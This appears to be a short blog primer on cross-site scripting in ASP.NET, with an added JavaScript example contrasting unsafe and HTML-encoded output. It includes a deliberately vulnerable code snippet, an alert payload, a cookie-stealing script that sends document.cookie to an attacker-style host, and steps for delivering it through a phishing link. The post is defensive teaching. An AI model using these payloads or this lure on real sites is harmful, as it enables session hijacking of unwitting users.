Primer on Cross-Site Scripting

In its security push Microsoft evangelises (amongst other things) on defending against known weaknesses. This is done by using best practices and the best technology to mitigate the risks of threats.

One of the threats is Cross-Site Scripting (XSS), where malicious (or simply annoying) script is injected as part of a page. The vulnerability exploited is unvalidated user input that is taken and “pasted” as part of the page. Here’s a simple example to get you in the right frame of mind:

<SCRIPT RUNAT="server">
  // Vulnerable: the query-string value reaches the page unvalidated and unencoded
  void Page_Load(object sender, EventArgs e) {
    lblPostedBy.Text = Request.QueryString["ForumUserName"];
  }
</SCRIPT>

Now imagine that someone would put as his forum name (and it might be read from Session variables or from a database as well) not “LX” but “<SCRIPT>alert('.NET Rulez');</SCRIPT>”. Pretty annoying, right? It gets worse. Try this:

<IMG NAME="dummyImage"><SCRIPT>document.forms[0].dummyImage.src = 'http://www.illhackyouremailaccount.com/storecookieinfo.aspx?cookie=' + document.cookie;</SCRIPT>

This is a way to do cookie hijacking with an XSS technique. All you need to do is send people a mail with a link looking like “Click here to get VS2005 Team System for free” and have the URL point to www.somesite.com/showinbox.asp?forumname=… where the dots represent the bit from <IMG> in URL-encoded form. If the site is vulnerable to XSS it will send the cookie information to the other site, where it is stored. There it is used to manipulate a cookie that will allow you to enter the session of the user that was tricked into clicking the link.
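To make the fix concrete, here is an added example (not code from the original post) that renders the forum name the unsafe way, as the server snippet above does, and beside it the hardened way, HTML-encoding the value before it is pasted into the page. The function names and the span template are assumptions; the attack string is the one quoted above.

```javascript
// Added example: unsafe vs. encoded rendering of an untrusted forum name.
// Function names and the span template are my own (assumptions); the
// attack string is the one quoted in the post.

// Encode the five characters that let untrusted text break out of HTML
// text content or an attribute value.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query-string value is pasted straight into the markup,
// exactly what lblPostedBy.Text = Request.QueryString[...] does.
function renderPostedByUnsafe(forumUserName) {
  return '<span id="lblPostedBy">' + forumUserName + "</span>";
}

// Hardened: same template, but the value is encoded first, so any markup
// in it is displayed as text instead of being parsed as HTML.
function renderPostedBySafe(forumUserName) {
  return '<span id="lblPostedBy">' + htmlEncode(forumUserName) + "</span>";
}

// Crude check a reviewer or test can run over rendered output: did the
// untrusted value survive as a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed inputs: a normal name and the payload quoted in the post.
const NORMAL_NAME = "LX";
const XSS_NAME = "<SCRIPT>alert('.NET Rulez');</SCRIPT>";

console.log(renderPostedByUnsafe(XSS_NAME)); // script tag is live
console.log(renderPostedBySafe(XSS_NAME));   // &lt;SCRIPT&gt;... shown as text
```

Output encoding is the complement to the HttpOnly mitigation: encoding stops the script from running at all, HttpOnly limits what a script that does run can read.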

So, now you know a bit about XSS. Tomorrow: a posting on how to mitigate this risk by using HttpOnly cookies, a new feature in Internet Explorer 6.0 SP1. (Actually the main reason why I elaborated on XSS.)
